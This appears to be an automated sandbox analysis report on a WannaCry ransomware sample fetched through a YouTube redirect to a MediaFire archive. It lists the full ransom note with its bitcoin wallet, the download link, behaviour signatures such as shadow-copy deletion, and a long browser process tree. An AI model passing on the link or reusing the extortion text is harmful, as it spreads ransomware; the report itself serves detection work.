Analysis
-
max time kernel
599s -
max time network
614s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
24-07-2021 07:25
General
-
Target
https://www.youtube.com/redirect?event=video_description&redir_token=QUFFLUhqazNIR0ZGMXk3ZlN3RjhzQUJQQ2ItRkJ6ckgzUXxBQ3Jtc0tuZlBOS2MyRENRTGx5V2RKVlllS3plSFNZaEk2cEs4UEI4S09jQlQ1SUFNeUc2ODB6OUljUFQ5ZDl2NEsyOHpIYlZRZWRXT2paeUZINmZNTm1QMndJdTN2S2FOalg5V28xS0Z4M3FrWEVrM01aSDBuaw&q=http%3A%2F%2Fwww.mediafire.com%2Ffile%2F9f8fds9s3efg7so%2FWannaCry_by_Rafael.rar%2Ffile
-
Sample
210724-hfvm3qllnj
Score
10/10
Malware Config
Extracted
Path
C:\Users\Admin\AppData\Local\Temp\7zOC85A8F76\@Please_Read_Me@.txt
Family
wannacry
Ransom Note
Q: What's wrong with my files?
A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted.
If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!
Let's start decrypting!
Q: What do I do?
A: First, you need to pay service fees for the decryption.
Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw
Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software.
Run and follow the instructions! (You may need to disable your antivirus for a while.)
Q: How can I trust?
A: Don't worry about decryption.
We will decrypt your files surely because nobody will trust us if we cheat users.
* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window.
�
Wallets
12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw
Signatures
-
Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
-
Wannacry
WannaCry is a ransomware cryptoworm.
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Executes dropped EXE 50 IoCs
-
Modifies extensions of user files 17 IoCs
Ransomware generally changes the extension on encrypted files.
-
Drops startup file 2 IoCs
-
Loads dropped DLL 6 IoCs
-
Modifies file permissions 1 TTPs 1 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 2 IoCs
-
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 5 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
-
Modifies registry class 3 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 4 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 57 IoCs
-
Suspicious use of SendNotifyMessage 38 IoCs
-
Suspicious use of SetWindowsHookEx 28 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/redirect?event=video_description&redir_token=QUFFLUhqazNIR0ZGMXk3ZlN3RjhzQUJQQ2ItRkJ6ckgzUXxBQ3Jtc0tuZlBOS2MyRENRTGx5V2RKVlllS3plSFNZaEk2cEs4UEI4S09jQlQ1SUFNeUc2ODB6OUljUFQ5ZDl2NEsyOHpIYlZRZWRXT2paeUZINmZNTm1QMndJdTN2S2FOalg5V28xS0Z4M3FrWEVrM01aSDBuaw&q=http%3A%2F%2Fwww.mediafire.com%2Ffile%2F9f8fds9s3efg7so%2FWannaCry_by_Rafael.rar%2Ffile1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffa3bea4f50,0x7ffa3bea4f60,0x7ffa3bea4f702⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1476,6843778686052702283,17094074495414623234,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1548 /prefetch:22⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1476,6843778686052702283,17094074495414623234,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2180 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1476,6843778686052702283,17094074495414623234,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1820 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1476,6843778686052702283,17094074495414623234,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2816 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1476,6843778686052702283,17094074495414623234,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2824 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1476,6843778686052702283,17094074495414623234,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1476,6843778686052702283,17094074495414623234,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3420 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1476,6843778686052702283,17094074495414623234,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1476,6843778686052702283,17094074495414623234,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3444 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1476,6843778686052702283,17094074495414623234,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5104 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1476,6843778686052702283,17094074495414623234,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5264 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1476,6843778686052702283,17094074495414623234,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3048 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1476,6843778686052702283,17094074495414623234,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3180 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1476,6843778686052702283,17094074495414623234,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6584 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1476,6843778686052702283,17094074495414623234,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6612 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1476,6843778686052702283,17094074495414623234,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6628 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1476,6843778686052702283,17094074495414623234,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6636 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1476,6843778686052702283,17094074495414623234,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7028 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1476,6843778686052702283,17094074495414623234,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7036 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1476,6843778686052702283,17094074495414623234,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7784 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1476,6843778686052702283,17094074495414623234,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7500 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1476,6843778686052702283,17094074495414623234,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7812 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1476,6843778686052702283,17094074495414623234,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7948 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel --force-configure-user-settings2⤵
-
C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff7b872a890,0x7ff7b872a8a0,0x7ff7b872a8b03⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1476,6843778686052702283,17094074495414623234,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8528 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1476,6843778686052702283,17094074495414623234,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8740 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1476,6843778686052702283,17094074495414623234,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8764 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1476,6843778686052702283,17094074495414623234,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8780 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1476,6843778686052702283,17094074495414623234,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8796 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1476,6843778686052702283,17094074495414623234,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8844 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1476,6843778686052702283,17094074495414623234,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8820 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1476,6843778686052702283,17094074495414623234,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8716 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1476,6843778686052702283,17094074495414623234,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8884 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1476,6843778686052702283,17094074495414623234,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6036 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1476,6843778686052702283,17094074495414623234,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8588 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1476,6843778686052702283,17094074495414623234,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8904 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1476,6843778686052702283,17094074495414623234,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5544 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1476,6843778686052702283,17094074495414623234,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5420 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1476,6843778686052702283,17094074495414623234,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8980 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1476,6843778686052702283,17094074495414623234,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8964 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1476,6843778686052702283,17094074495414623234,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=9100 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1476,6843778686052702283,17094074495414623234,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=9528 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1476,6843778686052702283,17094074495414623234,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=9236 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1476,6843778686052702283,17094074495414623234,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=9524 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1476,6843778686052702283,17094074495414623234,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=9940 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1476,6843778686052702283,17094074495414623234,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=10068 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1476,6843778686052702283,17094074495414623234,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=10348 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1476,6843778686052702283,17094074495414623234,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=10396 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1476,6843778686052702283,17094074495414623234,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=10660 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1476,6843778686052702283,17094074495414623234,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=10512 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1476,6843778686052702283,17094074495414623234,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=9364 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1476,6843778686052702283,17094074495414623234,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=11348 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1476,6843778686052702283,17094074495414623234,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=11512 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1476,6843778686052702283,17094074495414623234,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=10232 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1476,6843778686052702283,17094074495414623234,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=11520 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1476,6843778686052702283,17094074495414623234,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=10256 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1476,6843778686052702283,17094074495414623234,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=11748 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1476,6843778686052702283,17094074495414623234,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=11644 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1476,6843778686052702283,17094074495414623234,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=11764 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1476,6843778686052702283,17094074495414623234,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=11292 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1476,6843778686052702283,17094074495414623234,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=9332 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1476,6843778686052702283,17094074495414623234,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=9396 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1476,6843778686052702283,17094074495414623234,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=11104 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1476,6843778686052702283,17094074495414623234,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=64 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10516 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1476,6843778686052702283,17094074495414623234,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12116 /prefetch:12⤵
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"1⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1032.0.2058199652\774563130" -parentBuildID 20200403170909 -prefsHandle 1520 -prefMapHandle 1476 -prefsLen 1 -prefMapSize 219680 -appdir "C:\Program Files\Mozilla Firefox\browser" - 1032 "\\.\pipe\gecko-crash-server-pipe.1032" 1612 gpu3⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1032.3.389695326\1536270674" -childID 1 -isForBrowser -prefsHandle 2268 -prefMapHandle 2368 -prefsLen 534 -prefMapSize 219680 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 1032 "\\.\pipe\gecko-crash-server-pipe.1032" 2376 tab3⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1032.13.608176469\1952991512" -childID 2 -isForBrowser -prefsHandle 3108 -prefMapHandle 3104 -prefsLen 1402 -prefMapSize 219680 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 1032 "\\.\pipe\gecko-crash-server-pipe.1032" 3120 tab3⤵
-
